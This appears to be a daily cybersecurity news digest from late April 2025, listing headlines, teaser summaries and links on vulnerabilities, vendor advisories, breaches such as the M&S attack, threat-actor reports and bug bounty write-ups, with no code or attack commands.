News from the specialist press
Cybersecurity in Mergers and Acquisitions – CISO Focus
Cybersecurity in mergers and acquisitions is crucial, as M&A activities represent key inflection points for organizations, offering growth opportunities while introducing significant security challenges. In today’s threat landscape, cybersecurity has become a decisive factor in M&A success, with studies showing that over 40% of deals face serious cybersecurity issues post-acquisition. The valuation impact can be […]
The post Cybersecurity in Mergers and Acquisitions – CISO Focus appeared first on Cyber Security News.
https://cybersecuritynews.com/cybersecurity-in-mergers-and-acquisitions/
Top Cybersecurity Trends Every CISO Must Watch in 2025
In 2025, cybersecurity trends for CISOs will reflect a landscape that is more dynamic and challenging than ever before. The rapid pace of technological change, the proliferation of connected devices, and the growing sophistication of cyber threats are pushing organizations to rethink their security strategies. For Chief Information Security Officers (CISOs), staying ahead of these […]
The post Top Cybersecurity Trends Every CISO Must Watch in 2025 appeared first on Cyber Security News.
https://cybersecuritynews.com/cybersecurity-trends-for-cisos/
Zero Trust Architecture – A CISO's Blueprint for Modern Security
Zero-trust architecture has become essential for securing operations in today's hyper-connected world, where corporate network boundaries have vanished and employees, cloud services, and data span multiple environments. This new reality has rendered traditional perimeter-based security models ineffective, exposing organizations to sophisticated cyber threats from both outside and within. As the guardians of enterprise security, Chief […]
The post Zero Trust Architecture – A CISO's Blueprint for Modern Security appeared first on Cyber Security News.
https://cybersecuritynews.com/zero-trust-architecture-2/
Chrome 136 Released With Patch For 20-Year-Old Privacy Vulnerability
The Chrome team has officially promoted Chrome 136 to the stable channel for Windows, Mac, and Linux, marking a significant update for users across platforms. The rollout, which will occur over the coming days and weeks, brings a host of fixes and improvements, with a particular focus on security and privacy enhancements. One of the […]
The post Chrome 136 Released With Patch For 20-Year-Old Privacy Vulnerability appeared first on Cyber Security News.
https://cybersecuritynews.com/chrome-136-released/
U.S. CISA adds SAP NetWeaver flaw to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SAP NetWeaver flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SAP NetWeaver flaw, tracked as CVE-2025-31324, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, researchers warned that a zero-day vulnerability, tracked as CVE-2025-31324 (CVSS score of 10/10), in SAP NetWeaver is […]
https://securityaffairs.com/177218/hacking/u-s-cisa-adds-sap-netweaver-flaw-to-its-known-exploited-vulnerabilities-catalog.html
Press news
Cyber attack on firm with ransom demand - Hindustan Times
Cyber attack on firm with ransom demand · The incident was reported at MJ Biopharm Pvt Ltd Company located in Phase 2 of Hinjewadi Rajiv Gandhi ...
https://www.hindustantimes.com/cities/pune-news/cyber-attack-on-firm-with-ransom-demand-101745952867968.html
Yesterday's news (specialist press)
How to Access the World's Top AI Tools with AIChief in One Platform
AIChief is the top AI tools directory offering expert reviews, side-by-side comparisons, news updates, and promotional services for tool owners. It saves users hours of research, ensuring trusted insights and exposure for AI startups, developers, students, and professionals navigating the evolving AI landscape.
https://hackernoon.com/how-to-access-the-worlds-top-ai-tools-with-aichief-in-one-platform?source=rss
Slackware 15.0: 2025-119-02 critical: mozilla-thunderbird security fix
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.
https://linuxsecurity.com/advisories/slackware/slackware-2025-119-02-mozilla-thunderbird-5znjcoimfb17
Slackware 15.0: 2025-119-01 critical: mozilla-firefox security improvements
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.
https://linuxsecurity.com/advisories/slackware/slackware-2025-119-01-mozilla-firefox-fcp8irht3drv
Why Generative AI and That Human Touch Can Transform Your Online HR Software Strategy
The integration of generative AI into your HR software can rapidly transform how you carry out traditional HR practices, introducing new time-saving features and streamlining processes.
https://hackernoon.com/why-generative-ai-and-that-human-touch-can-transform-your-online-hr-software-strategy?source=rss
Selvaraja Elumalai's Digital Evolution at a Leading Pharmaceutical Company
Selvaraja Elumalai revolutionized a pharma company's QC labs with a digital transformation that reduced errors, cut documentation time by 40%, and improved regulatory speed. His integrated system approach set new industry benchmarks for compliance, efficiency, and data integrity in highly regulated environments.
https://hackernoon.com/selvaraja-elumalais-digital-evolution-at-a-leading-pharmaceutical-company?source=rss
It Worked for a While - So, Why Did Everything Break?
Success isn't the end, it's the beginning of new risks. In product management, second-order thinking is critical to anticipate what breaks after a "win." From unexpected pricing disasters to broken standup rituals, this piece shares real-world lessons and a practical "Ripple Radar" blueprint to help PMs and PM leaders future-proof their launches before they unravel.
https://hackernoon.com/it-worked-for-a-while-so-why-did-everything-break?source=rss
Fedora 42 Update: digikam addresses Libraw security issues
update internal Libraw to 2025/03/17 snapshot
https://linuxsecurity.com/advisories/fedora/fedora-42-digikam-2025-1c1e378468-dszznz1ufqyf
Fedora 42: 2025-17f64d2c4d moderate: IceCat JavaScript Fix
Rebuild with pregenerated cbindgen
https://linuxsecurity.com/advisories/fedora/fedora-42-icecat-2025-17f64d2c4d-eovnzovtwerx
Transforming Business Through SAP Innovation by Nagender Yadav
Nagender Yadav, a Deloitte leader and SAP expert, developed industry-defining solutions like DCHiPS, cutting SAP costs by up to 50% and timelines by 40%. His pricing designs improved healthcare access, and his AI- and analytics-driven methods modernize SAP implementations globally. A pioneer in enterprise systems, he's shaping SAP's future.
https://hackernoon.com/transforming-business-through-sap-innovation-by-nagender-yadav?source=rss
Fedora 42 - FEDORA-2025-caed275f11 critical: LibRaw Out-of-Buffer Access
Update to LibRaw 0.21.4.
https://linuxsecurity.com/advisories/fedora/fedora-42-mingw-libraw-2025-caed275f11-i3zpqrn7mrug
Escape the AIpocalypse: Essential Strategies for Developers
The AIpocalypse is here, and it means a lot of change for developers. I explore how we can approach the transition with poise and leverage our skills to be successful in this next era, not destroyed by it.
https://hackernoon.com/escape-the-aipocalypse-essential-strategies-for-developers?source=rss
Transforming Urban Mobility: Excellence in Transportation Systems Management by Sathish Rao
Sathish Rao optimized Florida's SR-7 corridor, boosting traffic flow, reducing delays, and cutting emissions. His leadership during high-profile events and real-time incidents showcased expert traffic systems management, setting a new standard for urban mobility and sustainability.
https://hackernoon.com/transforming-urban-mobility-excellence-in-transportation-systems-management-by-sathish-rao?source=rss
Architecting Speed and Reliability: Inside the FNB Bank Trading Platform Success
SanghaMithra Duggirala led the rapid deployment of FNB Bank's equities and bonds trading platform, achieving full production in just four months. Through innovative architecture and cross-team leadership, she set new standards for speed, system reliability, and enterprise fintech integration.
https://hackernoon.com/architecting-speed-and-reliability-inside-the-fnb-bank-trading-platform-success?source=rss
SUSE: 2025:1402-1 important: Linux Kernel Security Threats Fixed
* bsc#1235431 * bsc#1240840 Cross-References: * CVE-2024-56650
https://linuxsecurity.com/advisories/suse/suse-2025-1402-1-important-the-linux-kernel-hffpengqclad
Securing the Future: Varun Grover's Blueprint for Safe and Scalable Generative AI
Varun Grover champions secure Generative AI adoption through AISPM, thought leadership, and enterprise strategy. His work helps organizations mitigate AI threats, ensure compliance, and scale responsibly—positioning him as a key voice in the future of AI security.
https://hackernoon.com/securing-the-future-varun-grovers-blueprint-for-safe-and-scalable-generative-ai?source=rss
Grinex exchange suspected rebrand of sanctioned Garantex crypto firm
A new cryptocurrency exchange named Grinex is believed to be a rebrand of Garantex, a Russian cryptocurrency exchange whose domains were seized by the U.S. authorities and an admin arrested. [...]
https://www.bleepingcomputer.com/news/cryptocurrency/grinex-exchange-suspected-rebrand-of-sanctioned-garantex-crypto-firm/
Are AI Deities the Future for Worshipers?
The Tianhou Temple in Johor, Malaysia, has unveiled the world's first AI-powered Mazu statue. The statue is a digital representation of the revered Chinese sea goddess. It allows devotees to interact with a digital deity displayed on a screen.
https://hackernoon.com/are-ai-deities-the-future-for-worshipers?source=rss
Mantra Crash Fallout: Is Investor Confidence in Tokenized RWAs at Risk?
The OM token powering Mantra's RWA blockchain collapsed 90% in hours, triggering B in losses and exposing deep cracks in trust, liquidity, and transparency.
https://hackernoon.com/mantra-crash-fallout-is-investor-confidence-in-tokenized-rwas-at-risk?source=rss
Powering Bolivia: Glory Shrivastava's Engineering Feat in Industrial Automation
Controls Engineer Glory Shrivastava led a high-stakes automation upgrade for Bolivia's national gas supply. Managing design to commissioning, she delivered complex PLC, BMS, and HMI systems on time, setting new safety and efficiency benchmarks in industrial automation under intense pressure.
https://hackernoon.com/powering-bolivia-glory-shrivastavas-engineering-feat-in-industrial-automation?source=rss
Microsoft: Windows Server hotpatching to require subscription
Microsoft has announced it will require paid subscriptions for Windows Server 2025 hotpatching, a service that enables admins to install security updates without restarting. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-server-hotpatching-to-require-subscription/
Many Fuel Tank Monitoring Systems Vulnerable to Disruption
Thousands of automatic tank gauge (ATG) devices are accessible over the Internet and are just "a packet away" from compromise, security researcher warns at 2025 RSAC Conference.
https://www.darkreading.com/ics-ot-security/fuel-tank-monitoring-systems-vulnerable-disruption
Hackers ramp up scans for leaked Git tokens and secrets
Threat actors are intensifying internet-wide scanning for Git configuration files that can reveal sensitive secrets and authentication tokens used to compromise cloud services and source code repositories. [...]
https://www.bleepingcomputer.com/news/security/hackers-ramp-up-scans-for-leaked-git-tokens-and-secrets/
France ties Russian APT28 hackers to 12 cyberattacks on French orgs
Today, the French foreign ministry blamed the APT28 hacking group linked to Russia's military intelligence service (GRU) for targeting or breaching a dozen French entities over the last four years. [...]
https://www.bleepingcomputer.com/news/security/france-ties-russian-apt28-hackers-to-12-cyberattacks-on-french-orgs/
10 Best Cybersecurity Names At RSA Conference 2025
Marketing lesson from CISOs – Steve Morgan, Editor-in-Chief. Sausalito, Calif. – Apr. 29, 2025. Who has the best cybersecurity name at the RSA Conference in San Francisco this year? It depends on who you ask. The editors at Cybercrime Magazine took a swing at it.
The post 10 Best Cybersecurity Names At RSA Conference 2025 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/10-best-cybersecurity-names-at-rsa-conference-2025/
SentinelOne warns of threat actors targeting its systems and high-value clients
SentinelOne warns China-linked APT group PurpleHaze attempted reconnaissance on its systems and high-value clients. Cybersecurity firm SentinelOne warns that a China-linked APT group, tracked as PurpleHaze, attempted to conduct reconnaissance on its infrastructure and high-value clients. The activity suggests targeted cyberespionage efforts aimed at gathering information for potential future attacks. SentinelOne first identified PurpleHaze’s activity […]
https://securityaffairs.com/177205/security/sentinelone-warns-threat-actors-targeting-its-systems-and-high-value-clients.html
How to Build a Private Linux Workstation
Let's be real: online privacy isn't optional anymore. Attacks are up, tracking is baked into everything, and if you're not locking things down, you're exposed. If you care about your data, it's on you to take the reins and actually secure it.
https://linuxsecurity.com/news/privacy/linux-privacy-workstation
From Mission-Centric to People-Centric: Competitive Leadership in Cyber
Making a case for empathy in cyber-leadership roles as a strategic business advantage.
https://www.darkreading.com/remote-workforce/mission-people-competitive-leadership-cyber
Hacking in Space: Not as Tough as You Might Think
Barbara Grofe, space asset security architect at Spartan Corp, discussed the realities of hacking in space, and the outlook is not pie-in-the-sky.
https://www.darkreading.com/cloud-security/hacking-space-not-tough
Scattered Spider Suspected in Major M&S Cyberattack
The cyberattack on Marks & Spencer (M&S) is linked to the notorious Scattered Spider group. Explore the severe…
https://hackread.com/scattered-spider-suspected-in-major-ms-cyberattack/
Apple 'AirBorne' flaws can lead to zero-click AirPlay RCE attacks
A set of security vulnerabilities in Apple's AirPlay Protocol and AirPlay Software Development Kit (SDK) exposed unpatched third-party and Apple devices to various attacks, including remote code execution. [...]
https://www.bleepingcomputer.com/news/security/apple-airborne-flaws-can-lead-to-zero-click-airplay-rce-attacks/
SK Telecom cyberattack: Free SIM replacements for 25 million customers
South Korean mobile provider SK Telecom has announced free SIM card replacements to its 25 million mobile customers following a recent USIM data breach, but only 6 million cards are available through May. [...]
https://www.bleepingcomputer.com/news/security/sk-telecom-cyberattack-free-sim-replacements-for-25-million-customers/
USN-7423-2: GNU binutils vulnerabilities
USN-7423-1 fixed several vulnerabilities in GNU. This update provides
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.
Original advisory details:
It was discovered that GNU binutils incorrectly handled certain inputs.
An attacker could possibly use this issue to cause a crash or execute
arbitrary code. (CVE-2025-0840)
It was discovered that GNU binutils incorrectly handled certain inputs.
An attacker could possibly use this issue to cause a crash, expose
sensitive information or execute arbitrary code.
(CVE-2025-1153)
It was discovered that ld in GNU binutils incorrectly handled certain
files. An attacker could possibly use this issue to execute arbitrary
code. (CVE-2025-1176)
https://ubuntu.com/security/notices/USN-7423-2
SecAI Debuts at RSA 2025, Redefining Threat Investigation with AI
San Francisco, United States, 29th April 2025, CyberNewsWire
https://hackread.com/secai-debuts-at-rsa-2025-redefining-threat-investigation-with-ai/
Cutting through the noise: How to prioritize Dependabot alerts
Learn how to effectively prioritize alerts using severity (CVSS), exploitation likelihood (EPSS), and repository properties, so you can focus on the most critical vulnerabilities first.
The post Cutting through the noise: How to prioritize Dependabot alerts appeared first on The GitHub Blog.
https://github.blog/security/application-security/cutting-through-the-noise-how-to-prioritize-dependabot-alerts/
Microsoft fixes Outlook paste, blank calendar rendering issues
Microsoft has confirmed several issues affecting Microsoft 365 customers using the "paste special" option and the calendar feature in the classic Outlook email client. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-paste-blank-calendar-rendering-issues/
US Critical Infrastructure Still Struggles With OT Security
How does a company defend itself from cyberattacks by a foreign adversary? A collection of experts gathered at this year's RSAC Conference to explain how the US can help.
https://www.darkreading.com/remote-workforce/critical-infrastructure-struggles-ot-security
How Healthcare Providers Investigate And Prevent Cyber Attacks: Real-world Examples
According to IBM Security annual research, “Cost of a Data Breach Report 2024”, an average cost of a data breach in healthcare in 2024 was .77 million, the highest among all industries due to sensitive patient data and regulatory penalties. A Reality Check: Healthcare Cybercrime Scale Just some more statistics from recent research: Prevention Is […]
The post How Healthcare Providers Investigate And Prevent Cyber Attacks: Real-world Examples appeared first on Cyber Security News.
https://cybersecuritynews.com/how-healthcare-providers-investigate-and-prevent-cyber-attacks/
NVIDIA Riva Vulnerabilities Exposes Enable Authorized Access to Cloud Environments
A critical security flaw in NVIDIA's Riva framework, an AI-powered speech and translation service, has left cloud environments vulnerable to unauthorized access and exploitation. Trend Micro researchers uncovered two vulnerabilities, CVE-2025-23242 and CVE-2025-23243, stemming from misconfigured deployments that expose Riva's gRPC and Triton Inference Server endpoints to the public internet. These flaws enable threat actors to bypass […]
The post NVIDIA Riva Vulnerabilities Exposes Enable Authorized Access to Cloud Environments appeared first on Cyber Security News.
https://cybersecuritynews.com/nvidia-riva-vulnerabilities-exposes-enable-authorized-access/
6 Best CMMC Consulting Services for Small Businesses
The best CMMC consulting service for small businesses can help you stay competitive and compliant in the defense space. CMMC — or Cybersecurity Maturity Model Certification — is a security framework developed by the U.S. Department of Defense (DoD) to safeguard sensitive information across its supply chain. If you work with the DoD, you must […]
The post 6 Best CMMC Consulting Services for Small Businesses appeared first on IT Security Guru.
https://www.itsecurityguru.org/2025/04/29/6-best-cmmc-consulting-services-for-small-businesses/?utm_source=rss&utm_medium=rss&utm_campaign=6-best-cmmc-consulting-services-for-small-businesses
CISA Adds Broadcom Brocade Fabric OS Vulnerability to Known Exploited Vulnerabilities Catalog
CISA officially added a significant security flaw affecting Broadcom's Brocade Fabric OS to its authoritative Known Exploited Vulnerabilities (KEV) Catalog, underscoring the urgent need for remediation across enterprise and government environments. The vulnerability, tracked as CVE-2025-1976, is classified as a code injection vulnerability and carries a high CVSS base score of 8.6 due to its […]
The post CISA Adds Broadcom Brocade Fabric OS Vulnerability to Known Exploited Vulnerabilities Catalog appeared first on Cyber Security News.
https://cybersecuritynews.com/broadcom-brocade-fabric-os-vulnerability/
CISA tags Broadcom Fabric OS, CommVault flaws as exploited in attacks
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning of Broadcom Brocade Fabric OS, Commvault web servers, and Qualitia Active! Mail clients vulnerabilities that are actively exploited in attacks. [...]
https://www.bleepingcomputer.com/news/security/cisa-tags-broadcom-fabric-os-commvault-flaws-as-exploited-in-attacks/
AirPlay Zero-Click RCE Vulnerability Enables Remote Device Takeover via Wi-Fi
A critical vulnerability in Apple's AirPlay protocol, dubbed AirBorne, has exposed over 2.35 billion active Apple devices and tens of millions of third-party gadgets to remote code execution (RCE) attacks requiring no user interaction. Researchers at Oligo Security discovered that the flaw allows attackers on the same Wi-Fi network to hijack devices ranging from Macs […]
The post AirPlay Zero-Click RCE Vulnerability Enables Remote Device Takeover via Wi-Fi appeared first on Cyber Security News.
https://cybersecuritynews.com/airplay-zero-click-rce-vulnerability/
AI Expands Trillion Total Addressable Market For Cybersecurity Providers
This week in cybersecurity from the editors at Cybercrime Magazine – Read the press release from EIN Presswire. Sausalito, Calif. – Apr. 29, 2025. AI is expanding a trillion total addressable market (TAM) for cybersecurity providers, according to a 2024/2025 study by McKinsey, a global
The post AI Expands Trillion Total Addressable Market For Cybersecurity Providers appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ai-expands-2-trillion-total-addressable-market-for-cybersecurity-providers/
Risks of Using AI Models Developed by Competing Nations
The current offline/open source model boom is unstoppable. Its impact depends on how well the risks are managed today.
https://www.darkreading.com/vulnerabilities-threats/risks-using-ai-models-developed-competing-nations
Digital rampage saw ex-Disney employee remove nut allergy info from menus, dox co-workers, and more
A former Disney employee has been sentenced to three years in prison for computer fraud and identity theft.
https://www.malwarebytes.com/blog/news/2025/04/digital-rampage-saw-ex-disney-employee-remove-nut-allergy-info-from-menus-dox-co-workers-and-more
Windows Backdoor Targets Members of Exiled Uyghur Community
A spear-phishing campaign sent Trojanized versions of legitimate word-processing software to members of the World Uyghur Congress as part of China's continued cyber-espionage activity against the ethnic minority.
https://www.darkreading.com/cyberattacks-data-breaches/windows-backdoor-targets-members-exhiled-uyghur-community
Google Chrome Vulnerability Let Attackers Escape Payload from Sandbox – Technical Details Disclosed
A critical vulnerability in Google Chrome has recently been discovered that allows malicious actors to break out of the browser’s protective sandbox environment, potentially giving attackers access to the underlying operating system. The flaw, identified as CVE-2025-2783, affects Chrome versions prior to 134.0.6998.142 across Windows, macOS, and Linux platforms. This vulnerability represents a significant security […]
The post Google Chrome Vulnerability Let Attackers Escape Payload from Sandbox – Technical Details Disclosed appeared first on Cyber Security News.
https://cybersecuritynews.com/google-chrome-vulnerability-let-attackers-escape-payload-from-sandbox/
USN-7469-3: Node.js vulnerability
USN-7469-1 fixed a vulnerability in Apache Traffic Server. This update
provides the corresponding updates for Node.js.
Original advisory details:
It was discovered that Apache Traffic Server exhibited poor server
resource management in its HTTP/2 protocol. An attacker could possibly
use this issue to cause Apache Traffic Server to crash, resulting in
a denial of service.
https://ubuntu.com/security/notices/USN-7469-3
Rocky Linux Achieves FIPS 140-3 Compliance
Rocky Linux has taken a major leap forward by achieving FIPS 140-3 compliance for versions 8 and 9.2. This achievement makes the already popular distro an even more attractive option for admins managing environments that require stringent encryption and cryptographic standards, such as in government agencies and regulated industries.
https://linuxsecurity.com/news/vendors-products/rocky-linux-fips-140-3-compliance
Reinforcing resilience with financial assurance: Breach protection matters now more than ever
Introducing Rapid7's value-added Breach Protection Warranty that delivers confidence, clarity, and coverage when it matters most.
https://blog.rapid7.com/2025/04/29/reinforcing-resilience-with-financial-assurance-breach-protection-matters-now-more-than-ever/
InsightIDR AI Alert Triage Automatically Classifies Alerts with 99.93% Accuracy
Rapid7's AI Alert Triage – trained and tested by the Rapid7 global MDR service across trillions of alerts worldwide — will soon be available to users of our next-gen SIEM, InsightIDR, at no additional cost.
https://blog.rapid7.com/2025/04/29/insightidr-ai-alert-triage-automatically-classifies-alerts-with-99-93-accuracy/
Deepening the MDR partnership: Rapid7 now delivers Active Remediation with Velociraptor
Powered by our best-in-class, open-source digital forensics and incident response (DFIR) tool, Rapid7 MDR analysts can take direct, approved remediation actions on your behalf.
https://blog.rapid7.com/2025/04/29/deepening-the-mdr-partnership-rapid7-now-delivers-active-remediation-with-velociraptor/
Pulsegram - Integrated Keylogger With Telegram
PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts. ⚠️ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited.
http://www.kitploit.com/2025/04/pulsegram-integrated-keylogger-with.html
Driving down MTTR with Remediation Hub, Available in Rapid7 Exposure Command
Rapid7's Remediation Hub enables security teams to go beyond simply identifying vulnerabilities and focus more on remediating risk.
https://blog.rapid7.com/2025/04/29/driving-down-mttr-with-remediation-hub-available-in-rapid7-exposure-command/
From Exposure to Assurance: Unified Remediation Across the Security Lifecycle
Rapid7's Exposure Command directly addresses this gap, combining advanced risk-based vulnerability management (RBVM) with environmental context, threat intelligence, and native workflow automation.
https://blog.rapid7.com/2025/04/29/from-exposure-to-assurance-unified-remediation-across-the-security-lifecycle/
Google Threat Intelligence Group (GTIG) tracked 75 actively exploited zero-day flaws in 2024
Google tracked 75 zero-day flaws exploited in 2024, down from 98 in 2023, according to its Threat Intelligence Group’s latest analysis. In 2024, Google tracked 75 exploited zero-day vulnerabilities, down from 98 in 2023 but up from 63 in 2022. The researchers from Google Threat Intelligence Group (GTIG) observed that most targeted are end-user platforms, […]
https://securityaffairs.com/177180/hacking/google-threat-intelligence-group-gtig-tracked-75-actively-exploited-zero-day-flaws-in-2024.html
What privacy? Perplexity wants your data, builds browser to track you and serve ads
AI search service Perplexity AI doesn't just want you using its app—it wants to take over your web browsing experience too.
https://www.malwarebytes.com/blog/uncategorized/2025/04/what-privacy-perplexity-wants-your-data-builds-browser-to-track-you-and-serve-ads
VeriSource data breach impacted 4M individuals
VeriSource breach exposed data of 4M people in Feb 2024; stolen info includes personal details from an employee benefits services provider. VeriSource is alerting 4 million people after a February 2024 breach that exposed personal information. The data was stolen on February 27, 2024, and the incident was discovered on February 28, 2024. The company […]
https://securityaffairs.com/177172/data-breach/verisource-services-inc-data-breach.html
Outlaw cybergang attacking targets worldwide
The Kaspersky Global Emergency Response Team (GERT) detected an Outlaw mining botnet in a customer incident. In this article, we share insights into this botnet's SSH-based infection chain.
https://securelist.com/outlaw-botnet/116444/
Gremlin Stealer: New Stealer on Sale in Underground Forum
Advertised on Telegram, Gremlin Stealer is new malware active since March 2025 written in C#. Data stolen is uploaded to a server for publication.
The post Gremlin Stealer: New Stealer on Sale in Underground Forum appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-malware-gremlin-stealer-for-sale-on-telegram/
Google: 97 zero-days exploited in 2024, over 50% in spyware attacks
Google's Threat Intelligence Group (GTIG) says attackers exploited 75 zero-day vulnerabilities in the wild last year, over 50% of which were linked to spyware attacks. [...]
https://www.bleepingcomputer.com/news/security/google-97-zero-days-exploited-in-2024-over-50-percent-in-spyware-attacks/
Vulnerability Exploitation Is Shifting in 2024-25
The number of vulnerabilities exploited by attacks may not be growing these days, but they are increasingly affecting enterprise technologies.
https://www.darkreading.com/vulnerabilities-threats/vulnerability-exploitation-shifting-2024-25
Cloudflare Tunnel Misconfigurations: A Silent Threat in DevOps Pipelines
An inside look at how misconfigured Cloudflare Tunnels in DevOps environments silently open doors for cyber attackers.
In the modern DevOps ecosystem, where rapid deployment and secure remote access are crucial, Cloudflare Tunnel (formerly known as Argo Tunnel) has become a favorite. It allows developers to expose internal services to the internet securely — without needing to open inbound ports or manage complex firewall rules.
However, what most teams fail to realize is this: Cloudflare Tunnel misconfigurations can unintentionally introduce critical vulnerabilities into CI/CD pipelines and production environments.
Let's dive into how, why, and what can be done about it.
🌐 What Is Cloudflare Tunnel?
At its core, Cloudflare Tunnel establishes an outbound-only connection from your internal...
https://infosecwriteups.com/cloudflare-tunnel-misconfigurations-a-silent-threat-in-devops-pipelines-c1842ca56fdd?source=rss----7b722bfd1b8d---4
How I Access the Deleted Files of Someone in Google Drive | Bug Bounty
The Illusion of Deletion: How Trashed Files in Google Drive Can Still Be Accessed — Understanding Google Drive's Trashed File Accessibility
Hi Guys,
Introduction:
So today, we will be discussing an interesting discovery about Google Drive's trash functionality — something that might surprise you. If you've ever assumed that moving a file to the trash means it's completely inaccessible, think again!
What if I told you that your supposedly “deleted” file could still be downloaded with just one simple trick? It all started when I stumbled upon an interesting behavior in Google Drive — something that didn't quite make sense. I had a file, shared publicly with “Anyone with the link” as a viewer, and I decided to delete it by moving it to the trash. Naturally, I...
https://infosecwriteups.com/how-i-access-the-deleted-files-of-someone-in-google-drive-bug-bounty-eac134df1de4?source=rss----7b722bfd1b8d---4
Automating Information Gathering for Ethical Hackers — AutoRecon Tutorial
Here’s how AutoRecon automates the recon phase and gives you faster, cleaner results in your penetration tests.
https://infosecwriteups.com/automating-information-gathering-for-ethical-hackers-autorecon-tutorial-cd0448dad93f?source=rss----7b722bfd1b8d---4
$140 Bounty: Full Path Disclosure on ads.twitter.com
Twitter Ads Bug Bounty: $140 for Discovering a Sensitive Information Leak
https://infosecwriteups.com/140-bounty-full-path-disclosure-on-ads-twitter-com-bdedd140ac27?source=rss----7b722bfd1b8d---4
How Hackers Try to Bypass 403 Forbidden Pages
How Hackers Try to Bypass 403 Forbidden Pages 🔥
https://infosecwriteups.com/how-hackers-try-to-bypass-403-forbidden-pages-239c3f51a674?source=rss----7b722bfd1b8d---4
How I Set Up a Free Server That I'll Never Have to Pay For
About one year ago, after my Amazon Web Services and Google Cloud trials expired, I started looking for other free cloud services.
https://infosecwriteups.com/how-i-set-up-a-free-server-that-ill-never-have-to-pay-for-804b5fe52901?source=rss----7b722bfd1b8d---4
Finding Child Abuse Sites on the Darkweb
CASE STUDY
How I mapped 100+ child exploitation sites via StealthMole
What is StealthMole?
StealthMole is a cyber intelligence platform specializing in Deep and Darkweb monitoring and threat intelligence. It helps investigators, analysts, and law enforcement track malicious activities hidden beyond the regular internet.
StealthMole continuously monitors hidden services, darknet marketplaces, encrypted platforms like Telegram, and compromised data repositories, offering actionable intelligence through a user-friendly interface. Some of its core modules include:
- Darkweb Tracker
- Telegram Tracker
- Compromised Dataset
- Credential Lookout
- Ransomware Monitoring
- Leaked Monitoring
- Government Monitoring
- Defacement Alerts
Unlike basic scrapers or search engines, StealthMole offers investigation-grade...
https://infosecwriteups.com/finding-child-abuse-sites-on-the-darkweb-efc3a954caf6?source=rss----7b722bfd1b8d---4
WooCommerce Users Beware: Fake Patch Phishing Campaign Unleashes Site Backdoors
Imagine this: you’re running your WooCommerce store, sipping coffee ☕, and an urgent email lands in your inbox. It screams, “Critical…
https://infosecwriteups.com/woocommerce-users-beware-fake-patch-phishing-campaign-unleashes-site-backdoors-d77ccb847d8b?source=rss----7b722bfd1b8d---4
JWT, Meet Me Outside: How I Decoded, Re-Signed, and Owned the App
Hey there! 😁
https://infosecwriteups.com/jwt-meet-me-outside-how-i-decoded-re-signed-and-owned-the-app-95791eabcf5d?source=rss----7b722bfd1b8d---4
Hackers Exploit Craft CMS Flaws: A Deep Dive into CVE-2025–32432
Imagine running a sleek website powered by Craft CMS, only to discover that hackers have slipped through the digital backdoor, wreaking…
https://infosecwriteups.com/hackers-exploit-craft-cms-flaws-a-deep-dive-into-cve-2025-32432-edfab5a4819b?source=rss----7b722bfd1b8d---4
USN-7455-5: Linux kernel (AWS) vulnerabilities
Jann Horn discovered that the watch_queue event notification subsystem in
the Linux kernel contained an out-of-bounds write vulnerability. A local
attacker could use this to cause a denial of service (system crash) or
escalate their privileges. (CVE-2022-0995)
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
- iSCSI Boot Firmware Table Attributes driver;
- Network drivers;
- File systems infrastructure;
- NTFS3 file system;
- Ethernet bridge;
- Ethtool driver;
- IPv6 networking;
- Network traffic control;
- VMware vSockets driver;
(CVE-2024-26837, CVE-2025-21993, CVE-2025-21702, CVE-2024-50248,
CVE-2024-46826, CVE-2024-50256, CVE-2025-21703,...
https://ubuntu.com/security/notices/USN-7455-5
U.S. CISA adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are […]
https://securityaffairs.com/177161/hacking/u-s-cisa-adds-qualitia-active-mail-broadcom-brocade-fabric-os-and-commvault-web-server-flaws-to-its-known-exploited-vulnerabilities-catalog.html
Introducing EntraFalcon – A Tool to Enumerate Entra ID Objects and Assignments
TL;DR: PowerShell tool to enumerate Entra ID objects, assignments and identify highly privileged objects or risky configurations. https://github.com/CompassSecurity/EntraFalcon Entra ID environments can contain thousands of objects – users, groups, service principals, and more – each with unique properties and complex relationships. While manual reviews through the Entra portal might be feasible in smaller environments, they […]
https://blog.compass-security.com/2025/04/introducing-entrafalcon-a-tool-to-enumerate-entra-id-objects-and-assignments/
Yesterday's News (Press)
Britain's M&S says cyber attack has hit food availability in some stores - Reuters
Britain's M&S says cyber attack has hit food availability in some stores ... LONDON, April 29 (Reuters) - British retailer Marks & Spencer (MKS.L) , ...
https://www.reuters.com/business/retail-consumer/britains-ms-says-cyber-attack-has-hit-food-availability-some-stores-2025-04-29/
M&S cyber attack that has crippled sales is 'linked to gang of teenage hackers' - The Mirror
M&S cyber attack that has crippled sales is 'linked to gang of teenage hackers'. Reports say the group, said to include members as young as 16 ...
https://www.mirror.co.uk/money/ms-cyber-attack-crippled-stores-35138761
Britain's M&S says cyber attack has hit food availability in some stores - Yahoo Finance
Britain's M&S says cyber attack has hit food availability in some stores.
